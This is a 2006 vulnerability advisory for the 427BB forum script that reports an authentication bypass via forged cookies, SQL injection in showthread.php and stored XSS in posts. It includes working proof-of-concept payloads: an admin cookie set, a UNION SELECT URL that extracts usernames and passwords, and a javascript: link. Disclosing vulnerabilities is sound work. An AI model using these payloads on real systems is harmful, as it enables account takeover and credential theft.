Cookie Auth Bypass, SQL Injections, XSS in 427BB

Summary

Vulnerability
Cookie Auth Bypass, SQL Injections, XSS in 427BB
Discovered
2006.01.07
Last Update
0 n/a
ID
EV0018
CVE
CVE-2006-0153 CVE-2006-0154 CVE-2006-0155
Risk Level
high
Type
Multiple Vulnerabilities
Status
Unpatched
Vendor
n/a
Vulnerable Software
427BB (http://sourceforge.net/projects/fourtwosevenbb)
Version
checked: 2.2 and 2.2.1
PoC/Exploit
Available
Solution
Not available
Discovered by
Aliaksandr Hartsuyeu (eVuln.com)

Description

Multiple Vulnerabilities found in 427BB (http://sourceforge.net/projects/fourtwosevenbb) script.

427BB has multiple vulnerabilities.

1. Authentication bypass using modified cookie values.

Vulnerabe scripts: login.php getvars.php

To authorize any logged-in user forum scripts checks only three cookie values:

  • username
  • authenticated
  • usertype

Forum dont make password comparison.

2. 427BB has Multiple SQL Injection Vulnerabilities.

For example:

Vulnerabe script: showthread.php

Variable $ForumID isn't properly sanitized before being used in a SQL query. This can be used to make any SQL query by injecting arbitrary SQL code

3. Arbitrary script code insertion is possible when posting a message containing URL.

Vulnerable Script: posts.php

Condition: visitor needs to click this link

PoC/Exploit

1. Authentication bypass using modified cookie values.

No password needed:
Cookie: username=admin;Cookie: authenticated=1;Cookie: usertype=admin;

2. SQL Injection Example.

Need to be logged in as registered user.
http://host/bb427/showthread.php? ForumID=999%20union%20select%20UserName,Passwrod,null,null%20from%20prefPersonal

3. Arbitrary script code insertion.

Posting new message. Message text:
[url=javascript:alert(xss)]clickme[/url]

Solution.

Solution for "Cookie Auth Bypass, SQL Injections, XSS in 427BB" is not available. Check vendor's website for updates.